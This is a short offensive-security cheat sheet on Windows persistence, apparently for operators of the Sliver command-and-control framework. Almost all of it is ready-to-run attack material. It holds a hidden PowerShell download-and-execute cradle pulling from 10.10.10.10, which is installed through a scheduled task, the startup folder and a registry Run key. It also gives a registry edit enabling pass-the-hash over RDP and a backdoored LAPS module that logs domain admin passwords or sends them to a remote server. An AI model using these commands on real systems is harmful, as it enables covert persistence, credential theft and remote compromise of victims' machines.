Skip to main content

Persistence

Persistence on Windows

The commands that include execute-assembly have been executed from a Sliver beacon but can easily be used on other C2 frameworks as well with minimal changes.

  • Task scheduler
$str = 'IEX ((new-object net.webclient).downloadstring("http://10.10.10.10/a"))'
[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
execute-assembly -i -E SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc BASE64_STRING" -n "Updater" -m add -o hourly
  • Startup folder
execute-assembly -i -E SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc BASE64_STRING" -f "UserEnvSetup" -m add
  • Registry AutoRun
execute-assembly -i -E SharPersist.exe -t reg -c "C:\ProgramData\becaon.exe" -a "/q /n" -k "hkcurun" -v "Updater" -m add
  • Background powershell task
Start-Process -FilePath ".\file.exe" -ArgumentList "10.10.10.10 9001" -NoNewWindow
  • Disable PTH restrictions on RDP
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
// Main/AdmPwd.PS/Main.cs
PasswordInfo pi = DirectoryUtils.GetPasswordInfo(dn);

var line = $"{pi.ComputerName} : {pi.Password}";
System.IO.File.AppendAllText(@"C:\Temp\LAPS.txt", line);

WriteObject(pi);
// or make it call back to a server
using System.Net;
...
using (var client = new WebClient())
{
    client.BaseAddress = "http://10.10.10.10";

    try
    {
        client.DownloadString($"?computer={passwordInfo.Computername}&pass={passwordInfo.Password}");
    }
    catch 
    {
        // pass
    }
}